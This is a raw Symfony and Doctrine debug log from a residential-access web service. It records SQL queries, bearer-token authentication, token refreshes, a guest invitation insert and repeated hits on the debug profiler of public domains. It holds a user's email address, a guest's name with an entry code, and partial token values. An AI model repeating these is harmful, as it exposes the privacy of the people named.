[2025-12-16 19:25:28] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["fe99f3dd892fa0f7f14cc6ada1 [...]"] []
[2025-12-16 19:25:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-16 19:25:28] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 19:25:28] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 19:25:28] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 19:25:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-16 19:25:28] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
[2025-12-16 19:25:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
[2025-12-16 19:25:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-16 19:25:28] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?)) WHERE (a0_.id = ?) AND (a0_.status = ?) LIMIT 1 [398,274,1] []
[2025-12-16 19:25:28] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-16 19:25:28] doctrine.DEBUG: INSERT INTO invitation (uuid, status, date_created, date_modified, name, last_name, code, image_code_path, type, subtype, date_invitation, date_start, date_end, event_id, address_id, user_id) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) {"1":"1dba3403-6c6a-48c2-af5a-12 [...]","2":1,"3":"2025-12-16 19:25:28","4":"2025-12-16 19:25:28","5":"Beatriz","6":"Rosales","7":"523338","8":"/invitation/85156e8e6107c3 [...]","9":"1","10":null,"11":"2025-12-16 19:25:00","12":null,"13":null,"14":null,"15":274,"16":398} []
[2025-12-16 19:25:28] doctrine.DEBUG: "COMMIT" [] []
[2025-12-16 19:25:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-16 19:25:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.id = ? LIMIT 1 [274] []
[2025-12-16 19:25:28] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-16 19:25:28] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"20","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"c95c459d-212c-4555-98e9-59cee00445e5","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/c95c459d-212c-4555-98e9-59cee00445e5/invitation/20/0?order=desc","method":"GET"} []
[2025-12-16 19:25:28] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-16 19:25:28] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["fe99f3dd892fa0f7f14cc6ada1 [...]"] []
[2025-12-16 19:25:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-16 19:25:28] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-16 19:25:28] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-16 19:25:28] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-16 19:25:28] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 19:25:28] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 19:25:28] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 19:25:28] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["fe99f3dd892fa0f7f14cc6ada1 [...]"] []
[2025-12-16 19:25:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-16 19:25:28] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 19:25:28] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 19:25:28] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 19:25:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-16 19:25:28] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
[2025-12-16 19:25:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-16 19:25:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
[2025-12-16 19:25:28] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 20 OFFSET 0 [274,1] []
[2025-12-16 19:25:28] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [274,1] []
[2025-12-16 19:25:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-16 19:25:29] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-16 19:27:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2515c0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/2515c0","method":"GET"} []
[2025-12-16 19:27:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-16 19:34:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4c7627","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/4c7627?panel=twig","method":"GET"} []
[2025-12-16 19:34:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-16 19:38:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b4593c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b4593c?panel=exception","method":"GET"} []
[2025-12-16 19:38:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-16 19:41:07] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0145e4","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/0145e4?panel=cache","method":"GET"} []
[2025-12-16 19:41:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-16 19:47:04] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"49c3a7","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/49c3a7?panel=twig","method":"GET"} []
[2025-12-16 19:47:04] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-16 19:53:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"49c3a7","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/49c3a7?panel=time","method":"GET"} []
[2025-12-16 19:53:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-16 19:59:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4b64dc","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/4b64dc?panel=twig","method":"GET"} []
[2025-12-16 19:59:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-16 20:03:35] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0c03d3","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0c03d3?panel=cache","method":"GET"} []
[2025-12-16 20:03:35] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-16 20:05:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 20:05:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 20:06:02] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4b64dc","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/4b64dc?panel=request","method":"GET"} []
[2025-12-16 20:06:02] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-16 20:12:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2515c0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/2515c0?panel=twig","method":"GET"} []
[2025-12-16 20:12:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-16 20:16:43] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=address%2Cnotification_setting%2Cresidential","method":"GET"} []
[2025-12-16 20:16:43] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-16 20:16:43] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 20:16:43] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 20:16:43] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 20:16:43] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["ba49161f79430c9dba4797669f [...]"] []
[2025-12-16 20:16:43] security.INFO: Guard authentication failed. {"exception":"[object] (Hona\\AdminBundle\\Exception\\NotValidTokenFoundException(code: 0): Expired Token at /var/repositories/hona/src/Hona/AdminBundle/Security/AdminUserProvider.php:79)","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 20:16:43] security.DEBUG: The "Hona\ApiBundle\Security\ApiAuthenticator" authenticator set the response. Any later authenticator will not be called {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 20:16:45] request.INFO: Matched route "oauth2_token". {"route":"oauth2_token","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\OauthController::tokenAction","domain":"auth.unda.co","_route":"oauth2_token"},"request_uri":"https://auth.unda.co/oauth2/token","method":"POST"} []
[2025-12-16 20:16:45] php.INFO: User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead {"exception":"[object] (ErrorException(code: 0): User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead at /var/repositories/hona/vendor/doctrine/doctrine-bundle/Registry.php:62)"} []
[2025-12-16 20:16:45] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM refresh_token t0 WHERE t0.token = ? LIMIT 1 ["b1bcefd377ca6727c2b0c66fba [...]"] []
[2025-12-16 20:16:45] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-16 20:16:45] doctrine.DEBUG: INSERT INTO access_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"ea268be9b03224f64d066e1f1e [...]","3":"2025-12-16 20:46:45","4":"","5":458,"6":"[]"} []
[2025-12-16 20:16:45] doctrine.DEBUG: "COMMIT" [] []
[2025-12-16 20:16:45] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-16 20:16:45] doctrine.DEBUG: INSERT INTO refresh_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"2ddd8825467a868ac0ba2a908d [...]","3":"2026-02-14 20:16:45","4":"","5":458,"6":"[]"} []
[2025-12-16 20:16:45] doctrine.DEBUG: "COMMIT" [] []
[2025-12-16 20:16:45] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-16 20:16:45] doctrine.DEBUG: DELETE FROM refresh_token WHERE client_id = ? AND token = ? [0,"b1bcefd377ca6727c2b0c66fba [...]"] []
[2025-12-16 20:16:45] doctrine.DEBUG: "COMMIT" [] []
[2025-12-16 20:16:46] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=address%2Cnotification_setting%2Cresidential","method":"GET"} []
[2025-12-16 20:16:46] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-16 20:16:46] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 20:16:46] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 20:16:46] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 20:16:46] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["ea268be9b03224f64d066e1f1e [...]"] []
[2025-12-16 20:16:46] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [458] []
[2025-12-16 20:16:46] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 20:16:46] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 20:16:46] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 20:16:46] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["a1459bf9-4d7b-4d4c-ae6f-8a [...]"] []
[2025-12-16 20:16:46] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [458,1] []
[2025-12-16 20:16:46] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
[2025-12-16 20:16:46] doctrine.DEBUG: SELECT r0_.id AS id_0, r0_.uuid AS uuid_1, r0_.status AS status_2, r0_.date_created AS date_created_3, r0_.date_modified AS date_modified_4, r0_.name AS name_5, r0_.id_rule AS id_rule_6, r0_.plate_rule AS plate_rule_7, r0_.cp AS cp_8, r0_.neighborhood AS neighborhood_9, r0_.country AS country_10, r0_.state AS state_11, r0_.city AS city_12, u1_.permission AS permission_13 FROM residential r0_ INNER JOIN user_has_residential u1_ ON ((u1_.residential_id = r0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [458,1] []
[2025-12-16 20:16:46] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["ac5559db-94bf-49bb-b4bf-9d [...]"] []
[2025-12-16 20:16:46] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [458,259] []
[2025-12-16 20:16:46] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-16 20:16:47] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"20","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"ac5559db-94bf-49bb-b4bf-9d75cd7022a2","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/ac5559db-94bf-49bb-b4bf-9d75cd7022a2/invitation/20/0?order=desc","method":"GET"} []
[2025-12-16 20:16:47] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-16 20:16:47] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
